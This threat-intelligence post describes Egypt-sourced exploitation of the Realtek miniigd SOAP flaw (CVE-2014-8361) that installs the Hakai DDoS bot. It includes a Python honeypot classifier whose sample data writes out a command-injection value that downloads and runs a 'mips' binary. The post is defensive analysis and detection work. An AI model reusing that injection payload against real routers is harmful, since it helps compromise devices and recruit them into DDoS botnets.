
Realtek SDK Exploits on the Rise from Egypt

by ASERT Team

Executive Summary 

ASERT’s IoT honeypot network continuously monitors known exploit vectors, and we recently detected a spike in exploit attempts targeting the Realtek SDK miniigd SOAP vulnerability in consumer routers from the end of April 2019 through the first half of May 2019. The attacks originated from Egypt and, based on the volume of exploit attempts against South African routers, appear targeted. The payload includes commands to download and execute a variant of the Hakai DDoS bot.

Key Findings 

  • A 5,043% increase in exploit attempts (Figure 1), sourced from Egypt between April 22, 2019 and May 10, 2019, appeared to primarily target consumer routers in South Africa.
  • The exploitation attempts focus on IoT devices vulnerable to a remote command execution exploit in the Realtek SDK miniigd SOAP service (CVE-2014-8361).
  • The payload delivered to compromised devices is a variant of the Hakai DDoS bot, which can be used to conduct HTTP-, TCP- and UDP-based DDoS attacks.

Details 

IoT malware authors use exploits to help their malware propagate to as many devices as possible. Exploits leveraged within IoT malware range from newly discovered to several years old, as discussed in Fast & Furious IoT Botnets: Regifting Exploits. To track exploit attempts, our IoT honeypots monitor for connections attempting to exploit known vulnerabilities in IoT devices.

By counting the unique sources observed by our honeypots, we can approximate the number of locations and devices likely infected with IoT malware. Data collected between April 1 and May 10, 2019, shows a significant increase (Figure 1) in exploit attempts against the Realtek SDK miniigd SOAP vulnerability. Drilling further into the sources of the exploit attempts, 86.2% of the attack traffic originated from Egypt.

Figure 1: Number of Exploit Attempts by Unique Source

The majority of the exploit activity was logged by our South African honeypot (Figure 2).

Figure 2: Attacks Per Honeypot

IoT devices using the Realtek SDK miniigd SOAP service are vulnerable (CVE-2014-8361) to remote command execution. Once a device is compromised, attackers can download and execute malicious code on it. Figure 3 shows a sample of an exploit attempt captured by our honeypot network. The “mips” binary is delivered because MIPS is the architecture this exploit attempt targets.
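As an added illustration (not code from the original post), the following Python classifies honeypot-captured AddPortMapping requests to the miniigd UPnP service: a NewInternalClient value that is anything other than an IPv4 address is treated as a command-injection attempt, the payload URL and fetched file name (which usually hints at the target CPU, as with “mips” here) are extracted, and unique attacking sources are tallied per country the way Figure 1 does. The request records, addresses and URLs are constructed samples.

```python
import re
from collections import Counter
from urllib.parse import urlparse
# The miniigd UPnP action abused in CVE-2014-8361 exploit attempts. A valid
# NewInternalClient holds a LAN IPv4 address and nothing else.
SOAP_ACTION = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
IPV4 = re.compile(r"^(\d{1,3}\.){3}\d{1,3}$")
CLIENT = re.compile(r"<NewInternalClient>(.*?)</NewInternalClient>", re.S)
URL = re.compile(r"https?://[^\s;'\"`<>]+")

def classify(req):
    """Return None for a well-formed AddPortMapping request, or a record
    describing the command injection found in NewInternalClient."""
    if SOAP_ACTION not in req["headers"].get("SOAPAction", ""):
        return None
    m = CLIENT.search(req["body"])
    if not m:
        return None
    client = m.group(1).strip()
    if IPV4.match(client):
        return None  # a legitimate internal address
    urls = URL.findall(client)
    # The basename of the fetched file usually names the target CPU (e.g. "mips").
    arch = urlparse(urls[0]).path.rsplit("/", 1)[-1] if urls else None
    return {"src": req["src"], "country": req["country"], "injected": client,
            "payload_urls": urls, "arch_hint": arch}

def summarize(reqs):
    """Flagged requests plus the per-country share of unique attacking sources."""
    hits = [h for h in map(classify, reqs) if h]
    by_country = Counter(c for c, _ in {(h["country"], h["src"]) for h in hits})
    total = sum(by_country.values())
    shares = {c: round(100 * n / total, 1) for c, n in by_country.items()}
    return hits, shares

# Constructed sample honeypot records (not data from the original post).
HDR = {"SOAPAction": f'"{SOAP_ACTION}"'}
BENIGN = "<NewInternalClient>192.168.1.20</NewInternalClient>"
ATTACK = ("<NewInternalClient>`cd /tmp;wget http://203.0.113.10/mips;"
          "chmod 777 mips;./mips`</NewInternalClient>")
SAMPLES = [
    {"src": "198.51.100.7", "country": "EG", "headers": HDR, "body": ATTACK},
    {"src": "198.51.100.9", "country": "EG", "headers": HDR, "body": ATTACK},
    {"src": "198.51.100.9", "country": "EG", "headers": HDR, "body": ATTACK},
    {"src": "192.0.2.44", "country": "BR", "headers": HDR, "body": ATTACK},
    {"src": "10.0.0.5", "country": "ZA", "headers": HDR, "body": BENIGN},
]
if __name__ == "__main__":
    print(summarize(SAMPLES))
```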

Figure 3: Exploit Sample

The C2 delivering the malicious payload also hosted an installer script (Figure 4) of the kind commonly used by several IoT malware families. Within the download script we find support for several other architectures used by IoT devices. Such an installer script can be combined with other exploits, as described in Fast & Furious IoT Botnets: Regifting Exploits, to compromise vulnerable IoT devices.

Figure 4: Malicious Installer Script

After reverse engineering the “mips” binary captured by our honeypot, we believe it is a variant of the Hakai IoT DDoS bot compiled for the MIPS architecture and capable of communicating with an attacker-controlled C2 (Figure 5).

Figure 5: Hakai C2 Server Function

Hakai is an IoT DDoS bot that has been around since 2018 and is based on the Gafgyt family of IoT malware. Hakai uses several command injection vulnerabilities and supports the following DDoS capabilities: HTTP flooding, TCP flooding and UDP flooding. The Hakai variants hosted on the C2 include a new vseattack function, which performs a Valve Source Engine (VSE) query-flooding attack similar to the one found in Mirai.

Conclusion 

Based on our research, we continue to see a significant rise in the number of exploit attempts targeting IoT devices around the world. Typically, a new IoT device introduced onto the internet will, on average, see exploitation attempts of this nature within twenty-four hours of going online. We believe activity like this is a coordinated effort to recruit more bots. Though we do not know the motivations behind the surge in activity or the interest in South Africa, we believe this is only the preliminary phase as the actors behind the exploitation attempts seek to expand their botnet. ASERT will continue to monitor this activity and the broader landscape for malicious activity targeting IoT devices. In the meantime, we recommend patching known vulnerable devices to mitigate the threat.

Indicators of Compromise:

Hakai C2: 188.166.116[.]249
